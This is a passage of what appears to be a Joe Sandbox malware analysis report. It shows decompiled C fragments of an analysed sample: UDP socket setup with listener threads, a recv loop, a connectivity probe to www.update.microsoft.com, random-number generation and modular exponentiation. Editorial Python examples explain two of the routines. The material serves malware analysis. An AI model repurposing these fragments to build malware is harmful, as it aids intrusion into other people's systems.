                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleeprecvfrom
                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                  • API String ID: 668330359-3973262388
                                                                                  • Opcode ID: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction ID: 9b34ca997a713d65cf6cd99f526d658ac5dfd41d516b48eadd98018a806326ed
                                                                                  • Opcode Fuzzy Hash: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction Fuzzy Hash: 98216FF1940218EBDB20DB64DC89BE97774AB04308F1486E9E709B72C0D7B95AC68F5C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E0040DC40(intOrPtr __edi, void* __esi) {
                                                                                  				short _v8;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v24;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v33;
                                                                                  				char _v52;
                                                                                  				void* __ebx;
                                                                                  				void* _t21;
                                                                                  				short _t24;
                                                                                  				void* _t25;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t39 = __esi;
                                                                                  				_t38 = __edi;
                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					_t31 = E00408E40(0x24);
                                                                                  					 *_t31 = 0x756470;
                                                                                  					 *(_t31 + 4) = 0;
                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                  					__imp__#23(2, 2, 0x11, _t30);
                                                                                  					 *(_t31 + 8) = _t21;
                                                                                  					if(_t21 == 0xffffffff) {
                                                                                  						E0040E0A0(_t31, __edi);
                                                                                  						_t31 = 0;
                                                                                  					}
                                                                                  					if(_t31 == 0) {
                                                                                  						L8:
                                                                                  						return _t31;
                                                                                  					}
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_t24 = _v8;
                                                                                  					_v24 = _t24;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#9(_t39);
                                                                                  					_v30 = _t24;
                                                                                  					_v33 = 1;
                                                                                  					_t25 =  *(_t31 + 8);
                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                  					if(_t25 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                  						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040DE70, _t31, 0, 0);
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					E0040E0A0(_t31, _t38);
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040DC78
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DC87
                                                                                  • htons.WS2_32(00009E34), ref: 0040DCCA
                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040DCEC
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040DCFD
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040DD25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4174406920-0
                                                                                  • Opcode ID: e0deb46f6249aab11057c1623816a68f58c02373a903b3bf61f542a5b78949b5
                                                                                  • Instruction ID: e4b1bb25e16b1a4212620234c740e3462210c18eb357fd28b9ad958c2a756cf5
                                                                                  • Opcode Fuzzy Hash: e0deb46f6249aab11057c1623816a68f58c02373a903b3bf61f542a5b78949b5
                                                                                  • Instruction Fuzzy Hash: B0219FB4644301AEE710DFB48C8AB5B76A0AF48710F50897EFA54DE2C1D7F8C848876A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040B8F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				intOrPtr _t43;
                                                                                  
                                                                                  				_v12 = _a16;
                                                                                  				if(_a16 != 0xffffffff) {
                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                  				}
                                                                                  				_v8 = _a8;
                                                                                  				while(1) {
                                                                                  					_v16 = 0;
                                                                                  					_t38 = _a4;
                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                  					if(_t38 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v16 > 0) {
                                                                                  						if(_v16 >= _a12) {
                                                                                  							_v24 = _a12;
                                                                                  						} else {
                                                                                  							_v24 = _v16;
                                                                                  						}
                                                                                  						_t43 = _a4;
                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                  						_v20 = _t43;
                                                                                  						if(_v20 > 0) {
                                                                                  							if(_a16 != 0xffffffff) {
                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                  							}
                                                                                  							_a12 = _a12 - _v20;
                                                                                  							_v8 = _v8 + _v20;
                                                                                  						}
                                                                                  					}
                                                                                  					Sleep(1);
                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                  						L15:
                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                  					} else {
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  				goto L15;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040B902
                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B928
                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B95F
                                                                                  • GetTickCount.KERNEL32 ref: 0040B974
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B994
                                                                                  • GetTickCount.KERNEL32 ref: 0040B99A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                  • String ID:
                                                                                  • API String ID: 107502007-0
                                                                                  • Opcode ID: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction ID: b5ebabbcfa87b5d5b6093c606dafa0a0568610fd24292d9ee39f828ceab0bc2d
                                                                                  • Opcode Fuzzy Hash: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction Fuzzy Hash: 2831F0B4900209DFCB04DFA8D948BEE7BB1FF44315F108669E915A3390D7749A90CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 16%
                                                                                  			E00409880() {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				short _v30;
                                                                                  				short _v34;
                                                                                  				short _v38;
                                                                                  				intOrPtr _v40;
                                                                                  				short _v42;
                                                                                  				char _v44;
                                                                                  				char _v48;
                                                                                  				intOrPtr _t28;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				_v8 = 0xffffffff;
                                                                                  				_v24 = 0;
                                                                                  				_v22 = 0;
                                                                                  				_v18 = 0;
                                                                                  				_v14 = 0;
                                                                                  				_v10 = 0;
                                                                                  				_v24 = 2;
                                                                                  				__imp__#9(0x50);
                                                                                  				_v22 = 0;
                                                                                  				_t28 = E00409840("www.update.microsoft.com");
                                                                                  				_v20 = _t28;
                                                                                  				__imp__#23(2, 1, 0);
                                                                                  				_v28 = _t28;
                                                                                  				if(_v28 != 0xffffffff) {
                                                                                  					_t30 =  &_v24;
                                                                                  					__imp__#4(_v28, _t30, 0x10);
                                                                                  					if(_t30 == 0) {
                                                                                  						_v44 = 0;
                                                                                  						_v42 = 0;
                                                                                  						_v38 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v48 = 0x10;
                                                                                  						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                  						_v8 = _v40;
                                                                                  					}
                                                                                  					E00409940(_v28);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}

                                                                                  APIs
                                                                                  • htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409840: inet_addr.WS2_32(004098C1), ref: 0040984A
                                                                                    • Part of subcall function 00409840: gethostbyname.WS2_32(?), ref: 0040985D
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  Strings
                                                                                  • www.update.microsoft.com, xrefs: 004098B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                  • String ID: www.update.microsoft.com
                                                                                  • API String ID: 4063137541-1705189816
                                                                                  • Opcode ID: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction ID: 4856549373dc0ba92a891a61f9ce0befa44decce286b311d22d51fdce19958fb
                                                                                  • Opcode Fuzzy Hash: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction Fuzzy Hash: A121F9B5E102099BCB04DFF8D946AEEBBB5AF08310F10816DE519F3390E7745A45CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 22%
                                                                                  			E0040E110(void* __edi) {
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				char _v28;
                                                                                  				void* __ebx;
                                                                                  				void* _t15;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t27 = __edi;
                                                                                  				_t24 = E00408E40(0x24);
                                                                                  				 *_t24 = 0x756470;
                                                                                  				 *(_t24 + 4) = 1;
                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                  				__imp__#23(2, 2, 0x11);
                                                                                  				 *(_t24 + 8) = _t15;
                                                                                  				if(_t15 == 0xffffffff) {
                                                                                  					E0040E0A0(_t24, __edi);
                                                                                  					_t24 = 0;
                                                                                  				}
                                                                                  				if(_t24 == 0) {
                                                                                  					L6:
                                                                                  					return _t24;
                                                                                  				} else {
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                  					if(2 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                  						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040DE70, _t24, 0, 0);
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						E0040E0A0(_t24, _t27);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040E185
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040E1B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3943618503-0
                                                                                  • Opcode ID: 56d3525a3f54b9deeef16c4675a904cfe2f734bb61d8ed3d0d6a544bc60089b6
                                                                                  • Instruction ID: 22c9fd0d58bb21ad2c775b164571bc0b545b0ff679c75b8c31fe2abd1e05f37e
                                                                                  • Opcode Fuzzy Hash: 56d3525a3f54b9deeef16c4675a904cfe2f734bb61d8ed3d0d6a544bc60089b6
                                                                                  • Instruction Fuzzy Hash: E1119170640300AFE7509FB4DC86B5B7AE0EF48710F54897AFA58DE2D2E6F8D844875A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                   			// Fills the _a8-byte buffer at _a4 from the CSP's random source.
                                                                                   			// dwProvType 1 is PROV_RSA_FULL; dwFlags 0xF0000040 is
                                                                                   			// CRYPT_VERIFYCONTEXT | CRYPT_SILENT: an ephemeral handle with no
                                                                                   			// key container and no UI, the usual way to reach CryptGenRandom.
                                                                                   			// CryptAcquireContextW takes five parameters; the trailing __ecx the
                                                                                   			// decompiler shows is register noise, not a real argument.
                                                                                   			E0040AB50(void* __ecx, BYTE* _a4, int _a8) {
                                                                                   				long* _v8;            /* HCRYPTPROV */
                                                                                   				long** _t6;
                                                                                   
                                                                                   				_t6 =  &_v8;
                                                                                   				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx);
                                                                                   				// The decompiler reuses eax: the test below is on the BOOL returned
                                                                                   				// by CryptAcquireContextW, not on the address of _v8 (which is never 0).
                                                                                   				if(_t6 != 0) {
                                                                                   					CryptGenRandom(_v8, _a8, _a4);      /* hProv, dwLen, pbBuffer */
                                                                                   					return CryptReleaseContext(_v8, 0);
                                                                                   				}
                                                                                   				return _t6;                         /* i.e. the failed BOOL (0) */
                                                                                   			}

                                                                                   Disassembly addresses (instruction column not recovered): 0x0040ab5f 0x0040ab63 0x0040ab6b 0x0040ab79 0x00000000 0x0040ab85 0x0040ab8e

                                                                                  APIs
                                                                                  • CryptAcquireContextW.ADVAPI32(0040688C,00000000,00000000,00000001,F0000040,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB63
                                                                                  • CryptGenRandom.ADVAPI32(0040688C,?,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB79
                                                                                  • CryptReleaseContext.ADVAPI32(0040688C,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1815803762-0
                                                                                  • Opcode ID: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction ID: 1452194909b8924a7c7626270c55186fff6dc5d04cba850d0a96534bec71c57f
                                                                                  • Opcode Fuzzy Hash: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction Fuzzy Hash: 03E09275600308BBDB14CBE1EC49F9A777CAB08740F108154BB0997280DAB1EA40C7A8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 37%
                                                                                   			// Returns the current time as a 32-bit count of seconds since
                                                                                   			// 1980-01-01 (the DOS/FAT timestamp unit). NtQuerySystemTime writes a
                                                                                   			// 64-bit FILETIME-style value (100 ns ticks since 1601); the decompiler's
                                                                                   			// "void*" and "char" locals are really an 8-byte LARGE_INTEGER and a
                                                                                   			// 4-byte ULONG. RtlTimeToSecondsSince1980 returns FALSE when the time is
                                                                                   			// outside the 32-bit range; that return is ignored, so _v16 would then
                                                                                   			// be returned uninitialised.
                                                                                   			E0040C210() {
                                                                                   				void* _v12;           /* LARGE_INTEGER SystemTime */
                                                                                   				char _v16;            /* ULONG ElapsedSeconds */
                                                                                   
                                                                                   				NtQuerySystemTime( &_v12);
                                                                                   				__imp__RtlTimeToSecondsSince1980( &_v12,  &_v16);
                                                                                   				return _v16;
                                                                                   			}

                                                                                   Disassembly addresses (instruction column not recovered): 0x0040c21a 0x0040c228 0x0040c234

                                                                                  APIs
                                                                                  • NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                  • RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
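The two calls above yield the 32-bit seconds-since-1980 count that E0040C210 returns. The following Python is an example added here, not code from the sample or from the report: it reproduces RtlTimeToSecondsSince1980's conversion on Python integers, including the out-of-range case in which the NTDLL routine returns FALSE (and E0040C210, which ignores that return value, hands back an uninitialised _v16), and decodes such a count back to a UTC time. The epoch offset is derived in the code rather than hard-coded; the helper names are the editor's.

```python
from datetime import datetime, timedelta, timezone

TICKS_PER_SEC = 10_000_000                                  # FILETIME resolution: 100 ns
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)      # FILETIME / NtQuerySystemTime epoch
EPOCH_1980 = datetime(1980, 1, 1, tzinfo=timezone.utc)      # DOS/FAT epoch of RtlTimeToSecondsSince1980


def _whole_seconds(td: timedelta) -> int:
    # Integer arithmetic only; timedelta.total_seconds() goes through a float.
    return td.days * 86400 + td.seconds


# Offset between the two epochs in 100 ns ticks (derived here, not taken from the sample).
TICKS_1601_TO_1980 = _whole_seconds(EPOCH_1980 - EPOCH_1601) * TICKS_PER_SEC


def datetime_to_filetime(dt: datetime) -> int:
    """UTC datetime -> 64-bit FILETIME value, i.e. what NtQuerySystemTime writes."""
    return _whole_seconds(dt - EPOCH_1601) * TICKS_PER_SEC + dt.microsecond * 10


def filetime_to_seconds_since_1980(filetime: int):
    """Mirror of RtlTimeToSecondsSince1980: returns (ok, seconds).

    ok is False where the NTDLL routine returns FALSE: times before 1980-01-01
    and times whose second count does not fit in 32 bits. E0040C210 never
    checks this, so in those cases its return value is whatever was in _v16.
    """
    if filetime < TICKS_1601_TO_1980:
        return False, 0
    seconds = (filetime - TICKS_1601_TO_1980) // TICKS_PER_SEC
    if seconds > 0xFFFFFFFF:
        return False, 0
    return True, seconds


def seconds_since_1980_to_datetime(seconds: int) -> datetime:
    """Decode a count the sample would produce back to a UTC datetime."""
    if not 0 <= seconds <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit seconds-since-1980 count")
    return EPOCH_1980 + timedelta(seconds=seconds)


def rollover_datetime() -> datetime:
    """First instant the 32-bit count can no longer represent."""
    return EPOCH_1980 + timedelta(seconds=0x100000000)


if __name__ == "__main__":
    ok, now_1980 = filetime_to_seconds_since_1980(datetime_to_filetime(datetime.now(timezone.utc)))
    print(ok, now_1980, seconds_since_1980_to_datetime(now_1980), rollover_datetime())
```

When this count turns up in the sample's files or traffic, seconds_since_1980_to_datetime() gives the UTC time it encodes; note that it is a 32-bit unsigned value, so values close to 0xFFFFFFFF are far-future times, not negative offsets.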
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Time$QuerySecondsSince1980System
                                                                                  • String ID:
                                                                                  • API String ID: 1987401769-0
                                                                                  • Opcode ID: 824b9fd83ef3e9a4173328e3f8dbc040884a1b9c0466d9dd7e8dc2bdfcb6f9cc
                                                                                  • Instruction ID: d42e4d7b3755e1ac49109ca54fd3a4c3ae9de7c477aba9397811212140ea7005
                                                                                  • Opcode Fuzzy Hash: 824b9fd83ef3e9a4173328e3f8dbc040884a1b9c0466d9dd7e8dc2bdfcb6f9cc
                                                                                  • Instruction Fuzzy Hash: 12D0C779C0010DBBCB00DBE4E84DCDDB77CEB44201F0086D5ED15A3150EAB06A58CBD5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
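The routine listed next, E00402E90, has the shape of a sliding-window modular exponentiation: a window width chosen from a threshold table by the exponent's bit length, 1 << (w-1) precomputed odd powers of the base, and an MSB-first walk over the exponent words. The following Python is an example added here, not code from the sample or from the report: it implements that algorithm with the same structure on Python integers, so the control flow can be followed without the multi-word arithmetic, and it also covers the w <= 1 branch that the listing does not show. The threshold table is constructed (the sample's 8-entry table at 0x4143a4 is not reproduced on the page), and the helper names are the editor's.

```python
# Constructed stand-in for the 8-entry table the sample reads at 0x4143a4. The window
# width w is the number of entries <= the exponent's bit length, which is what the
# loop over _v28 in the listing computes. These values are an assumption.
WINDOW_THRESHOLDS = (0, 24, 80, 240, 672, 1792, 4608, 11520)


def choose_window(bit_length: int) -> int:
    w = 0
    while w < len(WINDOW_THRESHOLDS) and WINDOW_THRESHOLDS[w] <= bit_length:
        w += 1
    return w


def precompute_odd_powers(base: int, mod: int, w: int) -> list:
    """Entry i holds base^(2i+1) mod mod, for i in 0 .. 2^(w-1) - 1.

    Mirrors the listing's precomputation loop: base^2 is formed once (the
    E00402950 call), then each entry is the previous one times base^2
    (E00401960 multiplies, E00401BD0 reduces the double-length product).
    """
    base_sq = base * base % mod
    table = [base % mod]
    for _ in range(1, 1 << (w - 1)):
        table.append(table[-1] * base_sq % mod)
    return table


def square_and_multiply(base: int, exp: int, mod: int) -> int:
    """Plain binary method, for the case where the listing's w <= 1 branch applies."""
    result = 1
    for i in range(exp.bit_length() - 1, -1, -1):
        result = result * result % mod
        if (exp >> i) & 1:
            result = result * base % mod
    return result


def modexp_sliding_window(base: int, exp: int, mod: int) -> int:
    """base^exp mod mod by the sliding-window method."""
    if mod == 1:
        return 0
    bits = exp.bit_length()
    if bits == 0:
        return 1 % mod
    w = choose_window(bits)
    if w <= 1:
        return square_and_multiply(base, exp, mod)
    table = precompute_odd_powers(base, mod, w)
    result = 1
    i = bits - 1                                  # MSB first, like the 0x80000000 mask walk
    while i >= 0:
        if not (exp >> i) & 1:
            result = result * result % mod        # 0 bit outside a window: square only
            i -= 1
            continue
        # A 1 bit opens a window: extend it downward to at most w bits, then drop
        # trailing 0 bits so the window value is odd and indexes the table.
        j = max(i - w + 1, 0)
        while not (exp >> j) & 1:
            j += 1
        width = i - j + 1
        window = (exp >> j) & ((1 << width) - 1)
        for _ in range(width):                    # one squaring per consumed bit
            result = result * result % mod
        result = result * table[(window - 1) >> 1] % mod
        i = j - 1
    return result


if __name__ == "__main__":
    e = 0xF1E2D3C4B5A69788F1E2D3C4B5A69788F1E2D3C4B5A69788F1E2D3C4B5A69789
    m = (1 << 255) - 19
    print(choose_window(e.bit_length()), modexp_sliding_window(2, e, m) == pow(2, e, m))
```

The table index (window - 1) >> 1 is the counterpart of the listing's _v36, and the "square per consumed bit, then one table multiply" step is what the E00401960/E00401BD0 pairs inside the main loop perform on the result buffer _v16; the listing saves the very first multiply by copying the table entry instead (its _v56 flag).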

                                                                                  C-Code - Quality: 72%
                                                                                   			// Multi-precision routine over _a20-word operands (word _a20-1 is the most
                                                                                   			// significant). Reading of the arguments from the call pattern below, since
                                                                                   			// no symbols survive: _a8 base, _a12 exponent, _a16 modulus, _a20 word
                                                                                   			// count; _a4 is not touched in the visible part. The structure is that of
                                                                                   			// sliding-window modular exponentiation: E00402290 gives the exponent's bit
                                                                                   			// length, the 8-entry table at 0x4143a4 turns it into a window width w
                                                                                   			// (_v28), 1 << (w-1) odd powers of the base are precomputed (E00402950
                                                                                   			// squares the base into _v20; E00401960 multiplies, E00401BD0 reduces the
                                                                                   			// 2*_a20-word product modulo _a16), and the exponent is then walked
                                                                                   			// MSB-first with the mask in _v40. The comparisons on _v40 and _v60 must
                                                                                   			// be unsigned for the loops to run at all (0x80000000 <= 0 would exit
                                                                                   			// immediately); the decompiler's "signed int" is a type artifact. The
                                                                                   			// w <= 1 branch and the tail of the routine fall outside this listing.
                                                                                   			E00402E90(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                                  				signed int _v8;
